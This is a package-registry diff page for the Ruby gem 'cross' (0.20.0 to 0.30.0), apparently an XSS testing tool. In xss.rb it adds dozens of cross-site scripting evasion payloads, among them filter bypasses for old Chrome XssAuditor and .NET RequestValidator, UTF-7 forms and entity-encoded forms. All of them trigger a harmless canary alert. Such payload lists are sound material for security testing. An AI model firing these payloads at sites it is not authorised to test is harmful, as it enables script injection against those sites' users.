RubyGems - cross - Versions diffs - 0.20.0 → 0.30.0 - Mend

cross 0.20.0 → 0.30.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (4) hide show

data/lib/cross/version.rb CHANGED Viewed

@@ -1,3 +1,3 @@
 module Cross
-  VERSION = "0.20.0"
+  VERSION = "0.30.0"
 end

data/lib/cross/xss.rb CHANGED Viewed

@@ -9,7 +9,56 @@ module Cross
           "/--><script>alert('cross canary');</script>",
           "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
           "//;-->alert('cross canary');",
-          "\"//;\nalert('cross canary');"
+          "\"//;\nalert('cross canary');",
+          # more exotic vectors (antisnatchor's collection)
+          "<script/anyjunk>alert('cross canary')</script>",
+          "<<script>alert('cross canary');//<</script>",
+          "<img onerror=alert('cross canary') src=a>",
+          "<xml onreadystatechange=alert('cross canary')>",
+          "<style onreadystatechange=alert('cross canary')>",
+          "<iframe onreadystatechange=alert('cross canary')>",
+          "<object onerror=alert('cross canary')>",
+          "<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
+          "<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
+          "<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
+          "<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
+          "<script onreadystatechange=alert('cross canary')>",
+          "<bgsound onpropertychange=alert('cross canary')>",
+          "<body onbeforeactivate=alert('cross canary')>",
+          "<body onfocusin=alert('cross canary')>",
+          "<input autofocus onfocus=alert('cross canary')>",
+          "<input onblur=alert('cross canary') autofocus><input autofocus>",
+          "<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
+          "</a onmousemove=alert('cross canary')>",
+          "<video src=1 onerror=alert('cross canary')>",
+          "<audio src=1 onerror=alert('cross canary')>",
+          "<object data=javascript:alert('cross canary')>",
+          "<iframe src=javascript:alert('cross canary')>",
+          "<embed src=javascript:alert('cross canary')>",
+          "<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
+          "<event-source src=javascript:alert('cross canary')>",
+          "<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
+          "<x style=x:expression(alert('cross canary'))>",
+          "<x onclick=alert('cross canary') src=a>Click here</x>",
+          "<img onerror=\"alert('cross canary')\"src=a>",
+          "<img onerror=`alert('cross canary')`src=a>",
+          "<img/onerror=\"alert('cross canary')\"src=a>",
+          "<img onerror=a&#x6c;ert('cross canary') src=a>",
+          "<img onerror=a&#x06c;ert('cross canary') src=a>",
+          "<img onerror=a&#x006c;ert('cross canary') src=a>",
+          "<img onerror=a&#x0006c;ert('cross canary') src=a>",
+          "<img onerror=a&#108;ert('cross canary') src=a>",
+          "<img onerror=a&#0108;ert('cross canary') src=a>",
+          "<img onerror=a&#0108;ert('cross canary') src=a>",
+          "<img onerror=a&#108ert('cross canary') src=a>",
+          "<img onerror=a&#0108ert('cross canary') src=a>",
+          "<script>function::['alert']('cross canary')</script>",
+          "<svg><script>//&#x0A;alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
+          "<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
+          "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
+          "+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
+          "},alert('cross canary'),function x(){//", # DOM breaker
+          "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
         ]
         evasions.each do |pattern|
           yield pattern if block_given?

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: cross
 version: !ruby/object:Gem::Version
-  version: 0.20.0
+  version: 0.30.0
   prerelease:
 platform: ruby
 authors:
@@ -121,7 +121,6 @@ files:
 - .rvmrc
 - Gemfile
 - LICENSE
-- README.md
 - README.rdoc
 - Rakefile
 - VERSION
@@ -147,7 +146,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
       version: '0'
       segments:
       - 0
-      hash: 487062861682332119
+      hash: 3227883298359843932
 required_rubygems_version: !ruby/object:Gem::Requirement
   none: false
   requirements:
@@ -156,7 +155,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
       version: '0'
       segments:
       - 0
-      hash: 487062861682332119
+      hash: 3227883298359843932
 requirements: []
 rubyforge_project:
 rubygems_version: 1.8.24

data/README.md DELETED Viewed

@@ -1,29 +0,0 @@
-# Cross
-TODO: Write a gem description
-## Installation
-Add this line to your application's Gemfile:
-    gem 'cross'
-And then execute:
-    $ bundle
-Or install it yourself as:
-    $ gem install cross
-## Usage
-TODO: Write usage instructions here
-## Contributing
-1. Fork it
-2. Create your feature branch (`git checkout -b my-new-feature`)
-3. Commit your changes (`git commit -am 'Added some feature'`)
-4. Push to the branch (`git push origin my-new-feature`)
-5. Create new Pull Request